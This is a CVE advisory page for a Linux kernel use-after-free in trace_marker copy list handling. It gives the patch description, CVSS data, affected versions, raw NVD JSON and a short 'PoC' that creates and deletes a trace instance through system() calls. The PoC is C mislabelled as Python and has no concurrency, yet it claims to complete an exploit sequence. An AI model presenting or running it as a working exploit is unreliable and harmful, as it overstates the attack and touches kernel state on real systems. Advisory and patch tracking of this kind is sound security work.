CVE-2026-31541

Description

In the Linux kernel, the following vulnerability has been resolved: tracing: Fix trace_marker copy link list updates When the "copy_trace_marker" option is enabled for an instance, anything written into /sys/kernel/tracing/trace_marker is also copied into that instances buffer. When the option is set, that instance's trace_array descriptor is added to the marker_copies link list. This list is protected by RCU, as all iterations uses an RCU protected list traversal. When the instance is deleted, all the flags that were enabled are cleared. This also clears the copy_trace_marker flag and removes the trace_array descriptor from the list. The issue is after the flags are called, a direct call to update_marker_trace() is performed to clear the flag. This function returns true if the state of the flag changed and false otherwise. If it returns true here, synchronize_rcu() is called to make sure all readers see that its removed from the list. But since the flag was already cleared, the state does not change and the synchronization is never called, leaving a possible UAF bug. Move the clearing of all flags below the updating of the copy_trace_marker option which then makes sure the synchronization is performed. Also use the flag for checking the state in update_marker_trace() instead of looking at if the list is empty.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:* - VULNERABLE

Linux Kernel < commit 07183aac4a68

Linux Kernel < commit 75668e58244e

Linux Kernel < commit cc267e4b4302

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <stdlib.h>

// PoC for CVE-2026-31541: Linux Kernel trace_marker UAF
// This script demonstrates the sequence to trigger the race condition.
// Note: Exploiting the UAF requires precise timing and concurrent access.

int main() {
    printf("[*] Setting up the environment for CVE-2026-31541...\n");

    // 1. Ensure tracefs is mounted (usually at /sys/kernel/tracing)
    system("mount -t tracefs nodev /sys/kernel/tracing 2>/dev/null");

    // 2. Create a new trace instance
    system("mkdir /sys/kernel/tracing/instances/poc_instance");

    // 3. Enable the copy_trace_marker option for this instance
    // This adds the instance to the marker_copies list
    system("echo 1 > /sys/kernel/tracing/instances/poc_instance/options/copy_trace_marker");

    // 4. Simulate activity (writing to marker)
    system("echo 'trigger' > /sys/kernel/tracing/trace_marker");

    // 5. Delete the instance
    // The bug occurs here: flags are cleared before update_marker_trace(),
    // skipping synchronize_rcu() and potentially leaving a dangling pointer.
    printf("[*] Removing instance to trigger the bug...\n");
    system("rmdir /sys/kernel/tracing/instances/poc_instance");

    printf("[*] Exploit sequence completed.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31541
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31541
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31541/
[4] VulDB https://vuldb.com/cve/CVE-2026-31541
[5] https://git.kernel.org/stable/c/07183aac4a6828e474f00b37c9d795d0d99e18a7
[6] https://git.kernel.org/stable/c/75668e58244e63ec3785098a02e1cdcff14a6c2e
[7] https://git.kernel.org/stable/c/cc267e4b4302247dc67ef937a9ac587a696a43c1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31541", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:28.117", "lastModified": "2026-04-28T18:50:29.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix trace_marker copy link list updates\n\nWhen the \"copy_trace_marker\" option is enabled for an instance, anything\nwritten into /sys/kernel/tracing/trace_marker is also copied into that\ninstances buffer. When the option is set, that instance's trace_array\ndescriptor is added to the marker_copies link list. This list is protected\nby RCU, as all iterations uses an RCU protected list traversal.\n\nWhen the instance is deleted, all the flags that were enabled are cleared.\nThis also clears the copy_trace_marker flag and removes the trace_array\ndescriptor from the list.\n\nThe issue is after the flags are called, a direct call to\nupdate_marker_trace() is performed to clear the flag. This function\nreturns true if the state of the flag changed and false otherwise. If it\nreturns true here, synchronize_rcu() is called to make sure all readers\nsee that its removed from the list.\n\nBut since the flag was already cleared, the state does not change and the\nsynchronization is never called, leaving a possible UAF bug.\n\nMove the clearing of all flags below the updating of the copy_trace_marker\noption which then makes sure the synchronization is performed.\n\nAlso use the flag for checking the state in update_marker_trace() instead\nof looking at if the list is empty."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.16", "versionEndExcluding": "6.18.20", "matchCriteriaId": "1C570CE1-BC61-4BE6-9393-FD0CA8637367"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.10", "matchCriteriaId": "96D34333-38BE-4414-9E79-6EB764329581"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/07183aac4a6828e474f00b37c9d795d0d99e18a7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/75668e58244e63ec3785098a02e1cdcff14a6c2e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cc267e4b4302247dc67ef937a9ac587a696a43c1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}